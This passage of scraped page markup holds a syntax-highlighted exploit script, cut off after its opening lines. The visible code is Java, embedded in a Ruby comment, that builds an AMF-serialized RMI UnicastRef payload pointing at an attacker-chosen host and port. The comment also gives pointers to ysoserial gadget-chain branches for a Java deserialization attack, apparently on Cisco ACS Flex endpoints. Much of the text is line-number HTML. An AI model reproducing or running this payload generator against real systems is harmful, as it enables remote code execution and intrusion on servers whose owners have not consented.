data-line=\"crayon-5ad7c457c2e97650259174-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-151\">151<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-152\">152<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-153\">153<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-154\">154<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-155\">155<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-156\">156<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-157\">157<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-158\">158<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-159\">159<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-160\">160<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-161\">161<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-162\">162<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-163\">163<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-164\">164<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-165\">165<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-166\">166<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-167\">167<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-168\">168<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-169\">169<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-170\">170<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-171\">171<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-172\">172<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-173\">173<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-174\">174<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-175\">175<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-176\">176<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-177\">177<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-178\">178<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-179\">179<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-180\">180<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-181\">181<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-182\">182<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-183\">183<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-184\">184<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-185\">185<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-186\">186<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-187\">187<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-188\">188<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-189\">189<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-190\">190<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-191\">191<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-192\">192<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-193\">193<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-194\">194<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-195\">195<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-196\">196<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-197\">197<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-198\">198<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-199\">199<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-200\">200<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-201\">201<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-202\">202<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-203\">203<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-204\">204<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-205\">205<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-206\">206<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-207\">207<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-208\">208<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-209\">209<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-210\">210<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-211\">211<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-212\">212<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-213\">213<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-214\">214<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-215\">215<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-216\">216<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-217\">217<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-1\"><span class=\"crayon-c\">#!\/usr\/bin\/ruby<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-3\"><span class=\"crayon-c\">=begin<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-4\"><span class=\"crayon-c\">===<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-5\"><span class=\"crayon-c\">acsFlex.jar:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-7\"><span class=\"crayon-c\">import flex.messaging.io.amf.MessageBody;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-8\"><span class=\"crayon-c\">import flex.messaging.io.amf.ActionMessage;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-9\"><span class=\"crayon-c\">import flex.messaging.io.SerializationContext;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-10\"><span class=\"crayon-c\">import flex.messaging.io.amf.AmfMessageSerializer;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-11\"><span class=\"crayon-c\">import java.io.*;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-13\"><span class=\"crayon-c\">public class ACSFlex {<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-14\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;public static void main(String[] args) {<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-15\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1]));<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-16\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\/\/ serialize object to AMF message<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-17\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try {<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-18\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;byte[] amf = new byte[0];<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-19\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;amf = serialize((unicastRef));<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-20\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2]));<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-21\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;os.write(amf);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-22\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;System.out.println(&#8220;Done, payload written to &#8221; + args[2]);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-23\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} catch (IOException e) {<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-24\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;e.printStackTrace();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-25\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-26\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-27\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-28\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;public static Object generateUnicastRef(String host, int port) {<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-29\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;java.rmi.server.ObjID objId = new java.rmi.server.ObjID();<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-30\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-31\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-32\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return new sun.rmi.server.UnicastRef(liveRef);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-33\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-35\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;public static byte[] serialize(Object data) throws IOException {<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-36\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MessageBody body = new MessageBody();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-37\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;body.setData(data);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-38\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-39\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ActionMessage message = new ActionMessage();<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-40\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;message.addBody(body);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-41\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-42\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ByteArrayOutputStream out = new ByteArrayOutputStream();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-43\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-44\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;AmfMessageSerializer serializer = new AmfMessageSerializer();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-45\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;serializer.initialize(SerializationContext.getSerializationContext(), out, null);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-46\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;serializer.writeMessage(message);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-48\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return out.toByteArray();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-49\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-50\"><span class=\"crayon-c\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-51\"><span class=\"crayon-c\">===<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-52\"><span class=\"crayon-c\">ysoserial.jar:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-53\"><span class=\"crayon-c\">&#8211; Use the multiarg branch of https:\/\/github.com\/frohoff\/ysoserial<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-54\"><span class=\"crayon-c\">&#8211; Or patch ysoserial with CommonsCollections5Chained and CommonsCollections6Chain from https:\/\/github.com\/frohoff\/ysoserial\/issues\/71<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-55\"><span class=\"crayon-c\">===<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-56\"><span class=\"crayon-c\">=end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-57\">&nbsp;<\/div>\n<div 